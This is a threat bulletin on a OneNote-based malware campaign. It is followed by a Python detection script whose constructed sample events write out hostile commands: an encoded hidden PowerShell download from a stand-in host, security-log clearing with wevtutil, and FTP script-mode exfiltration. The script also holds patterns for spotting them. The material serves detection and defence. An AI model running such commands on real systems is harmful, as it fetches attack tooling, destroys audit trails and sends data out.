New And Emerging Dangers Hide Within OneNote
Category: Malware Campaign | Industry: Global | Level: Tactical | Source: Trustwave
Since December 2022, there has been an increase in weaponized Microsoft OneNote files infecting users and initiating an infection chain that results in data compromise or ransomware. Threat actors appear to favor OneNote because of its ability to embed files. Malware distributed in these recent campaigns has included Formbook, Qakbot, and AsyncRAT (a remote access trojan). A recent infection chain reported by Trustwave SpiderLabs begins with a phishing email themed as a fake product inquiry, carrying a OneNote document masquerading as a PDF file. Once opened, the trojanized OneNote file continues to present itself as a PDF and prompts the user to click a "View Document" link; clicking it instead launches a PyInstaller-based executable, which runs a PowerShell script. The script executes several commands to download a zip file containing credential collection tools, gather system information from the victim's host, clear logs and artifacts, and exfiltrate the data to a remote FTP server.
- Malicious Script/Package Installs Malware
Anvilogic Use Cases:
- Python Execution
- Invoke-WebRequest Command
- Windows FTP Exfiltration
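The following is an added detection example written for this bulletin; it is not code from Trustwave SpiderLabs or Anvilogic. It evaluates process-creation events against one rule per stage of the infection chain described above (OneNote spawning an executable, PowerShell fetching the tool archive with Invoke-WebRequest or one of its aliases, log clearing, and FTP exfiltration), covering the three listed use cases. The event field names are modelled on Sysmon process-creation records, the sample events are constructed, and two details are assumptions rather than facts from the report: that logs were cleared with `wevtutil`, and that exfiltration used the built-in `ftp.exe` client in script mode (`-s:`). The PowerShell rule also decodes `-EncodedCommand` payloads (base64 of UTF-16LE text) so a download command hidden that way is still matched.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (field names modelled on Sysmon event ID 1)."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# -EncodedCommand and the abbreviations PowerShell accepts; payload is base64 of UTF-16LE text.
_ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
# Invoke-WebRequest plus the aliases Windows PowerShell resolves to it.
_WEBREQ_RE = re.compile(r"\b(?:invoke-webrequest|iwr|curl|wget)\b", re.I)
_POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Child images assumed benign under OneNote (assumption; tune against your own baseline).
_ONENOTE_BENIGN_CHILDREN = {"onenote.exe", "onenotem.exe"}


def expand_encoded_command(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload so content rules see the real script."""
    m = _ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return f"{cmd} {decoded}"


def rule_onenote_spawns_child(ev: ProcessEvent) -> bool:
    """Stage 1: the OneNote lure launches an executable (PyInstaller-built in the report)."""
    return (_basename(ev.parent_image) == "onenote.exe"
            and _basename(ev.image) not in _ONENOTE_BENIGN_CHILDREN)


def rule_powershell_web_request(ev: ProcessEvent) -> bool:
    """Stage 2: PowerShell downloading the tool archive via Invoke-WebRequest or an alias."""
    return (_basename(ev.image) in _POWERSHELL
            and _WEBREQ_RE.search(expand_encoded_command(ev.command_line)) is not None)


def rule_event_log_cleared(ev: ProcessEvent) -> bool:
    """Stage 3: artifact clearing with wevtutil (cl / clear-log). Tooling assumed, not stated in the report."""
    return (_basename(ev.image) == "wevtutil.exe"
            and re.search(r"\b(?:cl|clear-log)\b", ev.command_line, re.I) is not None)


def rule_ftp_script_mode(ev: ProcessEvent) -> bool:
    """Stage 4: built-in ftp.exe driven by a script file (-s:). Tooling assumed, not stated in the report."""
    return _basename(ev.image) == "ftp.exe" and re.search(r"-s:", ev.command_line, re.I) is not None


RULES = {
    "onenote_spawns_child": rule_onenote_spawns_child,
    "powershell_web_request": rule_powershell_web_request,
    "event_log_cleared": rule_event_log_cleared,
    "ftp_script_mode": rule_ftp_script_mode,
}


def evaluate(events):
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build the sample below)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: four chain stages plus two benign events. Paths and names are made up.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
                 r"C:\Users\victim\AppData\Local\Temp\inquiry_pdf.exe",
                 r"C:\Users\victim\AppData\Local\Temp\inquiry_pdf.exe"),
    ProcessEvent(r"C:\Users\victim\AppData\Local\Temp\inquiry_pdf.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -enc " + encode_powershell(
                     r"Invoke-WebRequest -Uri http://example.invalid/tools.zip -OutFile $env:TEMP\t.zip")),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\ftp.exe", r"ftp.exe -n -s:C:\Users\victim\AppData\Local\Temp\up.txt"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe Get-ChildItem C:\Users\victim"),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
                 r"C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE", "ONENOTEM.EXE"),
]


if __name__ == "__main__":
    for idx, rule_name in evaluate(SAMPLE_EVENTS):
        print(f"[{rule_name}] {SAMPLE_EVENTS[idx].image}: {SAMPLE_EVENTS[idx].command_line}")
```

Each rule fires independently, so a pipeline can alert on any single stage and correlate by process lineage when several fire on one host; the OneNote-child rule in particular needs an allowlist tuned to the environment, since legitimate add-ins and print helpers will also appear as OneNote children.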